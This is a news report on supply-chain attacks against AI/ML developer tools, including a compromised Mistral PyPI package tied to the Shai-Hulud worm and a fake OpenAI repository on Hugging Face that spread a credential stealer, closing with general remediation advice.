A wave of sophisticated supply-chain attacks targeting artificial intelligence and machine learning (AI/ML) developer tools has been uncovered, putting cryptocurrency wallets and sensitive credentials at risk. Microsoft Threat Intelligence revealed that attackers compromised a Mistral AI software package distributed through the Python Package Index (PyPI). The malicious code, automatically executed on Linux systems, downloaded a secondary payload named transformers.pyz that mimicked the widely used Hugging Face Transformers library to blend into development environments. The malware primarily acted as a credential stealer, collecting login information and access tokens, and also included code that could randomly delete files on systems that appeared to be located in Israel or Iran, while avoiding Russian-language systems.
Mistral confirmed it was impacted by a supply-chain attack linked to the broader Shai-Hulud malware campaign, which began in September and targets software supply chains by infecting trusted developer packages. The company stated that an automated worm associated with the attack led to compromised npm and PyPI package versions, but emphasized there was no evidence its own infrastructure was compromised. Reports linked the incident to the open-sourcing of Shai-Hulud, a fully weaponized worm capable of spreading through Git repositories.
In a separate but related incident, a fake OpenAI repository on Hugging Face, pretending to be the legitimate Privacy Filter model, accumulated around 244,000 downloads before being taken down. Security researchers at HiddenLayer discovered the malicious repo under the namespace "Open-OSS/privacy-filter," which instructed users to clone the repository and run scripts. The script disabled SSL verification, fetched commands from a public JSON paste service, and initiated a stealthy infection chain on Windows. It deployed a Rust-based stealer that extracted browser data, Discord tokens, crypto wallet files, SSH and FTP credentials, and VPN details, then exfiltrated the data to a command-and-control server. The malware evaded virtual machines and debuggers, and its final payload was delivered via a scheduled task disguised as a Microsoft Edge updater.
These attacks highlight the growing intersection of AI development and crypto-security threats. Developers who ran the malicious scripts risk full compromise of their Windows machines, and security experts recommend immediately isolating affected systems, rotating all credentials stored on them, and moving crypto funds to new wallets created on clean devices. The widespread use of compromised packages through npm and PyPI—platforms with billions of downloads—underscores the risk to the entire blockchain development ecosystem.
